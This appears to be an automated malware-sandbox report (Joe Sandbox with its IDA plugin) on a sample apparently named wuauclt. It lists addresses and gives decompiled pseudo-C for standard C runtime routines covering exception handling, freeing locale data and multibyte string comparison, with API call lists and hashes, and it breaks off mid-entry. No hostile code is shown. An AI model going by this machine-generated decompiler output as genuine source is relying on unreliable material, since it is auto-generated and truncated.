                                                0x00000000
                                                0x00258ad0
                                                0x00258aca
                                                0x00258ac4
                                                0x0025897e
                                                0x0025897e
                                                0x00258985
                                                0x00000000
                                                0x00258987
                                                0x00258987
                                                0x0025898e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025898e
                                                0x00258985
                                                0x0025897c
                                                0x0025896f
                                                0x00258918
                                                0x00258920
                                                0x00258923
                                                0x00258928
                                                0x0025892b
                                                0x0025892c
                                                0x00258930
                                                0x00258939
                                                0x00000000
                                                0x0025893b
                                                0x0025893b
                                                0x0025893e
                                                0x00258943
                                                0x00258944
                                                0x00258946
                                                0x00000000
                                                0x00000000
                                                0x0025894c
                                                0x00258b4a
                                                0x00258b4a
                                                0x00258b4c
                                                0x00258b4d
                                                0x00258b54
                                                0x00258b57
                                                0x00258b65
                                                0x00258b6a
                                                0x00258b6a
                                                0x00258b6d
                                                0x00258b6d
                                                0x00258b75
                                                0x00258b78
                                                0x00258b79
                                                0x00258b7e
                                                0x00258b81
                                                0x00258b84
                                                0x00258b89
                                                0x00258b8b
                                                0x00258b8d
                                                0x00258b8e
                                                0x00258b8f
                                                0x00258b90
                                                0x00258b93
                                                0x00258b99
                                                0x00258c9a
                                                0x00258c9e
                                                0x00258b9f
                                                0x00258ba1
                                                0x00258ba6
                                                0x00258ba9
                                                0x00258bad
                                                0x00258bf4
                                                0x00258bf8
                                                0x00258c9f
                                                0x00258ca4
                                                0x00258ca5
                                                0x00258ca6
                                                0x00258ca8
                                                0x00258cab
                                                0x00258cac
                                                0x00258cad
                                                0x00258cb0
                                                0x00258cb1
                                                0x00258cb3
                                                0x00258d3b
                                                0x00258d40
                                                0x00258d41
                                                0x00258d44
                                                0x00258d45
                                                0x00258d46
                                                0x00258d47
                                                0x00258d4a
                                                0x00258d4c
                                                0x00258d4e
                                                0x00258d75
                                                0x00258d75
                                                0x00258d75
                                                0x00258d50
                                                0x00258d50
                                                0x00258d52
                                                0x00258d62
                                                0x00258d69
                                                0x00258d6b
                                                0x00000000
                                                0x00000000
                                                0x00258d6d
                                                0x00258d6e
                                                0x00258d71
                                                0x00258d73
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258d73
                                                0x00258d7c
                                                0x00258d7c
                                                0x00258d77
                                                0x00258d7b
                                                0x00258cb9
                                                0x00258cb9
                                                0x00258cbb
                                                0x00258cbd
                                                0x00258cbf
                                                0x00258cc4
                                                0x00258cc6
                                                0x00258ccc
                                                0x00258cd1
                                                0x00258cd1
                                                0x00258cd4
                                                0x00258cd7
                                                0x00258cda
                                                0x00258cda
                                                0x00258cdc
                                                0x00258cdf
                                                0x00258ce2
                                                0x00258ce5
                                                0x00258ce7
                                                0x00258cec
                                                0x00258cec
                                                0x00258cee
                                                0x00258cf1
                                                0x00258cfa
                                                0x00258cff
                                                0x00258d02
                                                0x00258d04
                                                0x00000000
                                                0x00000000
                                                0x00258d0c
                                                0x00258d0d
                                                0x00258d10
                                                0x00258d13
                                                0x00258d15
                                                0x00258d18
                                                0x00258d1b
                                                0x00000000
                                                0x00000000
                                                0x00258d1d
                                                0x00258d21
                                                0x00258d21
                                                0x00000000
                                                0x00258d21
                                                0x00258d1f
                                                0x00000000
                                                0x00258d1f
                                                0x00258d24
                                                0x00258d24
                                                0x00258d27
                                                0x00258d2a
                                                0x00258d2d
                                                0x00258d2d
                                                0x00258d2d
                                                0x00258cda
                                                0x00258d3a
                                                0x00258d3a
                                                0x00258bfe
                                                0x00258c0d
                                                0x00258c12
                                                0x00258c15
                                                0x00258c18
                                                0x00258c1d
                                                0x00258c1f
                                                0x00258c1f
                                                0x00258c22
                                                0x00258c25
                                                0x00258c28
                                                0x00258c34
                                                0x00258c3d
                                                0x00258c52
                                                0x00258c58
                                                0x00258c5a
                                                0x00258c60
                                                0x00258c62
                                                0x00258c67
                                                0x00258c7c
                                                0x00258c81
                                                0x00258c84
                                                0x00258c87
                                                0x00258c87
                                                0x00258c3f
                                                0x00258c46
                                                0x00258c4d
                                                0x00258c50
                                                0x00000000
                                                0x00000000
                                                0x00258c50
                                                0x00258c8a
                                                0x00258c8a
                                                0x00258c8d
                                                0x00258c8e
                                                0x00258c91
                                                0x00258c94
                                                0x00258c25
                                                0x00000000
                                                0x00258c1d
                                                0x00258baf
                                                0x00258bb1
                                                0x00258bb7
                                                0x00258bc1
                                                0x00000000
                                                0x00258bd3
                                                0x00258be4
                                                0x00258be9
                                                0x00258bee
                                                0x00258c98
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258bee
                                                0x00258bc1
                                                0x00258bad
                                                0x00258b99
                                                0x00258939
                                                0x00258903
                                                0x00258903
                                                0x00258907
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258907
                                                0x002588e0
                                                0x002588d4
                                                0x002588b5
                                                0x002588a6
                                                0x0025887d
                                                0x00258873

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00258930
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 002589AB
                                                • ___TypeMatch.LIBVCRUNTIME ref: 00258A29
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 00258AAB
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00258ADC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 00258B2B
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 00258B4D
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00258B65
                                                • _UnwindNestedFrames.LIBCMT ref: 00258B6D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00258B79
                                                • CallUnexpected.LIBVCRUNTIME ref: 00258B84
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: a6aabcbd047e106cae146ab88e525ad2973a962932316c9ee6c69381f96610a8
                                                • Instruction ID: 1ac75d5f46442f5fc583645d9684f8e3432ec73a9582396b862858b8e1d708f2
                                                • Opcode Fuzzy Hash: a6aabcbd047e106cae146ab88e525ad2973a962932316c9ee6c69381f96610a8
                                                • Instruction Fuzzy Hash: 61B19E7082020AEFCF24DF94C845AAEB7B5BF14316F144119EC1176251DBB1AAA9CFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00260EF0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00260EF0(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x272b18) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0025D2F4(_t46);
							E00260AAF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0025D2F4(_t47);
							E00260BAD( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0025D2F4( *((intOrPtr*)(_t74 + 0x7c)));
						E0025D2F4( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0025D2F4( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0025D2F4( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0025D2F4( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0025D2F4( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00261063( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x2725e8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E0025D2F4(_t31);
							E0025D2F4( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E0025D2F4(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E0025D2F4(_t74);
			}















                                                0x00260ef8
                                                0x00260efc
                                                0x00260f04
                                                0x00260f0d
                                                0x00260f12
                                                0x00260f19
                                                0x00260f21
                                                0x00260f29
                                                0x00260f34
                                                0x00260f3a
                                                0x00260f3b
                                                0x00260f43
                                                0x00260f4b
                                                0x00260f56
                                                0x00260f5c
                                                0x00260f60
                                                0x00260f6b
                                                0x00260f71
                                                0x00260f12
                                                0x00260f72
                                                0x00260f7a
                                                0x00260f8d
                                                0x00260fa0
                                                0x00260fae
                                                0x00260fb9
                                                0x00260fbe
                                                0x00260fc7
                                                0x00260fcf
                                                0x00260fd0
                                                0x00260fd6
                                                0x00260fd9
                                                0x00260fdc
                                                0x00260fe3
                                                0x00260fe5
                                                0x00260fe9
                                                0x00260ff1
                                                0x00260ff8
                                                0x00260ffe
                                                0x00260fff
                                                0x00260fff
                                                0x00261006
                                                0x00261008
                                                0x0026100d
                                                0x00261015
                                                0x0026101a
                                                0x0026101b
                                                0x0026101b
                                                0x0026101e
                                                0x00261021
                                                0x00261024
                                                0x00261027
                                                0x00261027
                                                0x00261039

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 00260F34
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260ACC
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260ADE
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260AF0
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B02
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B14
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B26
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B38
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B4A
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B5C
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B6E
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B80
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B92
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260BA4
                                                • _free.LIBCMT ref: 00260F29
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 00260F4B
                                                • _free.LIBCMT ref: 00260F60
                                                • _free.LIBCMT ref: 00260F6B
                                                • _free.LIBCMT ref: 00260F8D
                                                • _free.LIBCMT ref: 00260FA0
                                                • _free.LIBCMT ref: 00260FAE
                                                • _free.LIBCMT ref: 00260FB9
                                                • _free.LIBCMT ref: 00260FF1
                                                • _free.LIBCMT ref: 00260FF8
                                                • _free.LIBCMT ref: 00261015
                                                • _free.LIBCMT ref: 0026102D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID: %'
                                                • API String ID: 161543041-2848518416
                                                • Opcode ID: f5cf7c12a1229a5bb1122af053d23d668abac150ce762b8f0bee52d9d3befb28
                                                • Instruction ID: c9c5533fc20ef2b63a92b32d3794356af94f28c6ea5a9b679304e926874fdc75
                                                • Opcode Fuzzy Hash: f5cf7c12a1229a5bb1122af053d23d668abac150ce762b8f0bee52d9d3befb28
                                                • Instruction Fuzzy Hash: FE315A316202029FEB31AE79D886B5B73E8AF00311F144829E898D7992DF75ECE5DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025E872 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0025E872(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x269f10) {
					E0025D2F4(_t52);
					_t26 = _a4;
				}
				E0025D2F4( *((intOrPtr*)(_t26 + 0x3c)));
				E0025D2F4( *((intOrPtr*)(_a4 + 0x30)));
				E0025D2F4( *((intOrPtr*)(_a4 + 0x34)));
				E0025D2F4( *((intOrPtr*)(_a4 + 0x38)));
				E0025D2F4( *((intOrPtr*)(_a4 + 0x28)));
				E0025D2F4( *((intOrPtr*)(_a4 + 0x2c)));
				E0025D2F4( *((intOrPtr*)(_a4 + 0x40)));
				E0025D2F4( *((intOrPtr*)(_a4 + 0x44)));
				E0025D2F4( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E0025E738(5,  &_v8);
				_v8 =  &_a4;
				return E0025E788(4,  &_v8);
			}




                                                0x0025e878
                                                0x0025e87b
                                                0x0025e883
                                                0x0025e886
                                                0x0025e88b
                                                0x0025e88e
                                                0x0025e892
                                                0x0025e89d
                                                0x0025e8a8
                                                0x0025e8b3
                                                0x0025e8be
                                                0x0025e8c9
                                                0x0025e8d4
                                                0x0025e8df
                                                0x0025e8ed
                                                0x0025e8f5
                                                0x0025e8fe
                                                0x0025e906
                                                0x0025e91a

                                                APIs
                                                • _free.LIBCMT ref: 0025E886
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 0025E892
                                                • _free.LIBCMT ref: 0025E89D
                                                • _free.LIBCMT ref: 0025E8A8
                                                • _free.LIBCMT ref: 0025E8B3
                                                • _free.LIBCMT ref: 0025E8BE
                                                • _free.LIBCMT ref: 0025E8C9
                                                • _free.LIBCMT ref: 0025E8D4
                                                • _free.LIBCMT ref: 0025E8DF
                                                • _free.LIBCMT ref: 0025E8ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 909e7ca2422c73126a38e20ded1b46e40d98006a8bae74e0e052af3a6b8646ab
                                                • Instruction ID: 6d4e71cfb211b854c87947b8d822347ad783a7974cda4811e51d35be3c9ae584
                                                • Opcode Fuzzy Hash: 909e7ca2422c73126a38e20ded1b46e40d98006a8bae74e0e052af3a6b8646ab
                                                • Instruction Fuzzy Hash: 8511A476120189AFCF15EF98C842CD93BA5EF08351F4144A1BE088B222DB71DA69DF84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00265400 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E00265400(void* __ebx, void* __edi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __esi;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				short _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				short* _t127;
				signed int _t128;
				short* _t129;

				_t63 =  *0x271004; // 0x80aab37c
				_v8 = _t63 ^ _t128;
				_t127 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t127 <= 0) {
					if(_t127 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t127 = E00264F92(_t125, _t127);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E00264F92(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t127 == 0 || _t99 == 0) {
							if(_t127 != _t99) {
								if(_t99 <= 1) {
									if(_t127 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t127 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t127 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t127;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t127, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0025D32E(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E002676E0();
										_t87 = _t129;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t127 = _a32;
												if(MultiByteToWideChar(_t127, 1, _v36, _t127, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t127, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t127 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t127 = E0025D32E(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t127 == 0) {
																	goto L59;
																} else {
																	 *_t127 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E002676E0();
																_t127 = _t129;
																if(_t127 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t127 = 0xcccc;
																	L54:
																	_t127 =  &(_t127[4]);
																	L56:
																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t127, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E0025D5D9(_t108, _v48, _a12, _v32, _v44, _t127, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00260E53(_t127);
													}
												}
											}
										}
									}
								}
								E00260E53(_t100);
							}
						}
					}
				}
				L63:
				return E00257097(_v8 ^ _t128, _t127);
			}




































                                                0x00265408
                                                0x0026540f
                                                0x00265417
                                                0x0026541a
                                                0x00265420
                                                0x00265423
                                                0x00265426
                                                0x0026542a
                                                0x0026542d
                                                0x00265432
                                                0x00265459
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00265434
                                                0x0026543c
                                                0x0026543e
                                                0x00265442
                                                0x00265442
                                                0x00265447
                                                0x00265465
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00265449
                                                0x00265452
                                                0x00265467
                                                0x00265467
                                                0x0026546c
                                                0x00265473
                                                0x00265476
                                                0x00265476
                                                0x0026547b
                                                0x00265487
                                                0x00265494
                                                0x002654a1
                                                0x002654b4
                                                0x00000000
                                                0x002654b6
                                                0x002654b8
                                                0x002654eb
                                                0x00000000
                                                0x002654ed
                                                0x002654ef
                                                0x002654f3
                                                0x002654f9
                                                0x002654fc
                                                0x002654fe
                                                0x00265501
                                                0x00265501
                                                0x00265506
                                                0x00000000
                                                0x00000000
                                                0x00265508
                                                0x0026550c
                                                0x00265516
                                                0x0026551b
                                                0x00000000
                                                0x0026551d
                                                0x00000000
                                                0x0026551d
                                                0x0026551b
                                                0x00000000
                                                0x0026550c
                                                0x00265501
                                                0x002654fc
                                                0x00000000
                                                0x002654f3
                                                0x002654ba
                                                0x002654bc
                                                0x002654c0
                                                0x002654c6
                                                0x002654c9
                                                0x002654cb
                                                0x002654cb
                                                0x002654d0
                                                0x00000000
                                                0x00000000
                                                0x002654d2
                                                0x002654d6
                                                0x002654e0
                                                0x002654e5
                                                0x00000000
                                                0x002654e7
                                                0x00000000
                                                0x002654e7
                                                0x002654e5
                                                0x00000000
                                                0x002654d6
                                                0x002654cb
                                                0x002654c9
                                                0x00000000
                                                0x002654c0
                                                0x002654b8
                                                0x002654a3
                                                0x002654a3
                                                0x002654a3
                                                0x00000000
                                                0x002654a3
                                                0x00265496
                                                0x00265496
                                                0x00265498
                                                0x00265489
                                                0x00265489
                                                0x0026548b
                                                0x0026548b
                                                0x00265522
                                                0x00265522
                                                0x00265522
                                                0x0026552f
                                                0x00265535
                                                0x0026553a
                                                0x0026545b
                                                0x00265540
                                                0x00265540
                                                0x00265548
                                                0x0026554c
                                                0x002655a7
                                                0x002655a9
                                                0x00000000
                                                0x0026554e
                                                0x00265553
                                                0x00265555
                                                0x00265557
                                                0x0026555f
                                                0x00265583
                                                0x00265588
                                                0x0026558d
                                                0x00265593
                                                0x00000000
                                                0x00265599
                                                0x00265599
                                                0x00000000
                                                0x00265599
                                                0x00265561
                                                0x00265563
                                                0x00265567
                                                0x0026556c
                                                0x0026556e
                                                0x00265573
                                                0x00265688
                                                0x00265688
                                                0x00265579
                                                0x00265579
                                                0x0026559f
                                                0x0026559f
                                                0x002655a2
                                                0x002655ac
                                                0x002655ae
                                                0x00000000
                                                0x002655b4
                                                0x002655bc
                                                0x002655ca
                                                0x00000000
                                                0x002655d0
                                                0x002655d9
                                                0x002655df
                                                0x002655e4
                                                0x00000000
                                                0x002655ea
                                                0x002655ea
                                                0x002655ed
                                                0x002655f2
                                                0x002655f6
                                                0x00265642
                                                0x00000000
                                                0x002655f8
                                                0x002655fd
                                                0x002655ff
                                                0x00265601
                                                0x00265609
                                                0x00265626
                                                0x00265630
                                                0x00265632
                                                0x00265635
                                                0x00000000
                                                0x00265637
                                                0x00265637
                                                0x00000000
                                                0x00265637
                                                0x0026560b
                                                0x0026560d
                                                0x00265611
                                                0x00265616
                                                0x0026561a
                                                0x0026567c
                                                0x0026567c
                                                0x0026561c
                                                0x0026561c
                                                0x0026563d
                                                0x0026563d
                                                0x00265644
                                                0x00265646
                                                0x00000000
                                                0x0026565f
                                                0x0026565f
                                                0x00265678
                                                0x00265678
                                                0x00265646
                                                0x0026561a
                                                0x00265609
                                                0x00265680
                                                0x00265685
                                                0x002655e4
                                                0x002655ca
                                                0x002655ae
                                                0x00265573
                                                0x0026555f
                                                0x0026568c
                                                0x00265692
                                                0x0026553a
                                                0x0026547b
                                                0x00265447
                                                0x00265694
                                                0x002656a7

                                                APIs
                                                • GetCPInfo.KERNEL32(014BE790,014BE790,?,7FFFFFFF,?,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?,014BE790), ref: 002654AC
                                                • MultiByteToWideChar.KERNEL32(014BE790,00000009,014BE790,014BE790,00000000,00000000,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?), ref: 0026552F
                                                • __alloca_probe_16.LIBCMT ref: 00265567
                                                • MultiByteToWideChar.KERNEL32(014BE790,00000001,014BE790,014BE790,00000000,002656D9,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?), ref: 002655C2
                                                • __alloca_probe_16.LIBCMT ref: 00265611
                                                • MultiByteToWideChar.KERNEL32(014BE790,00000009,014BE790,014BE790,00000000,00000000,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?), ref: 002655D9
                                                  • Part of subcall function 0025D32E: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260DDA,00000000,?,0025BC44,?,00000008,?,0025E0BD,?,?,?), ref: 0025D360
                                                • MultiByteToWideChar.KERNEL32(014BE790,00000001,014BE790,014BE790,00000000,014BE790,?,002656D9,014BE790,014BE790,?,014BE790,?,?,?,?), ref: 00265655
                                                • __freea.LIBCMT ref: 00265680
                                                • __freea.LIBCMT ref: 0026568C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                • String ID:
                                                • API String ID: 3256262068-0
                                                • Opcode ID: 7a9502223ee78fa85b79f1ad18a6d767c3e51ca5d3b07209e652d8aadfab60e4
                                                • Instruction ID: e6c736010f5b4d3a7d77a17f2892598e4d567ae1591d6f91fe0dc8d88cb33755
